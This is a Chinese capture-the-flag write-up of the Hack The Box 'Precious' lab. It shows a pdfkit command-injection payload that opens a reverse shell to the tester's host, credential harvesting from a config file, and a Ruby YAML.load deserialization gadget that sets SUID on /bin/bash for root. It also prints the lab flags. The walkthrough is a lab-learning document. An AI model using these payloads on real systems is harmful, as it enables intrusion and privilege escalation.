Precious HTB Writeup

作者: doinb1517 | 来源:发表于2023-03-04 21:39 被阅读0次
logo.png

知识点

1、pdfkit的RCE漏洞

2、提权

WP

1、访问IP得到域名precious.htb

01.png

nmap扫描一波,开启了22,80端口

02.png

先测试网站功能点,网站上可以转换web页面成pdf,实验了一下百度,发现报错Cannot load remote URL!

03.png

使用python3起一个http server

python3 -m http.server 80

web页面上可以访问到当前目录,可以下载到文件,是pdf格式的

04.png

使用exiftool解析pdf文件信息

exiftool 5013dj9nl5h13bd7lmv8gkqn5ndpe8zz.pdf
05.png

找到一个命令注入漏洞,https://github.com/shamo0/PDFkit-CMD-Injection

开启一个webserver,重新开一个shell,监听反弹shell端口

http://10.10.14.18?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.14.18/9999 0>&1"`'}

拿到反弹shell

06.png

/home/ruby/.bundle目录下找到config文件,获取到了用户名和密码

07.png
henry@precious:~$ cat /home/henry/user.txt 
fd652c1495464dcea3800fd4801ba740

尝试提权

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

ruby的YAML.load函数是不安全的,会造成反序列换漏洞

参考:https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

payload如下

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id //这里改命令
         method_id: :resolve

改造一下 给/bin/bash加上SUID位

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

运行命令提权

sudo /usr/bin/ruby /opt/update_dependencies.rb

成功提权获得root权限

08.png
b281e4eebb264c1f8dee8589d9365517

相关文章

  • 第一届安洵杯writeup

    安洵官方writeup安洵writeup第一届安洵杯writeup MISC 幺元 booom 爆破 查看pass...

  • HCTF两道web题目

    HCTF WEB wp 官方Writeup: [https://bysec.io/hctf/writeup.htm...

  • precious

    心心念念,想要你。 从知道你存在那一刻起。 欢笑是为你,失神是为你。 心动是你,心痛也是为你。 你左右着我的世界的...

  • Precious

    care是真很珍贵的 每个人都只有一点关心,甚至很多人对自己也都不关心,所以真正的关心应该被珍惜,也应该看到,彼此...

  • Precious

    喜欢的东西千万不要等,等着等着就没了。年轻时总是因为错过捶胸顿足,现在就不会了,看到购物车里喜欢的商品下架,难过了...

  • Bank(Clear Text Credentials,SUID

    开放端口 详细端口信息 DNS 首先按照htb的习惯,我们假定靶机的域名是bank.htb,依此执行Zone Tr...

  • 2017-09-23 爱与知识相随

    A Precious Gem: ...

  • 10

    The service of the fruit is precious

  • 无标题文章

    my love my precious

  • heart

    taking care of precious things.

网友评论

    本文标题:Precious HTB Writeup

    本文链接:https://www.haomeiwen.com/subject/bqoyldtx.html